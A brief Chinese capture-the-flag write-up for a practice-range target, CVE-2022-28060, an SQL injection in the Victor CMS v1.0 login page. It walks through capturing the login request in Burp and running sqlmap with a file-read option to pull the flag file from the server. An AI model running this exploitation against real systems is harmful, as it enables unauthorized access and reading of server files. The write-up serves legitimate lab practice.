春秋云镜 CVE-2022-28060
春秋云镜 CVE-2022-28060
靶标介绍:
Victor CMS v1.0 /includes/login.php 存在sql注入
1.打开环境之后进入该路径,看到一个登录界面
2.尝试登录,并使用burp进行抓包
3.将抓包的报文放到一个文件中
4.使用sqlmap进行爆破
sqlmap -r 1.txt --file-read "/flag" --dbms mysql
捕获该地址
cat /home/wxm/.local/share/sqlmap/output/eci-2zeiq2tg2xj2vwdexjfu.cloudeci1.ichunqiu.com/files/_flag
拿到flag
浙公网安备 33010602011771号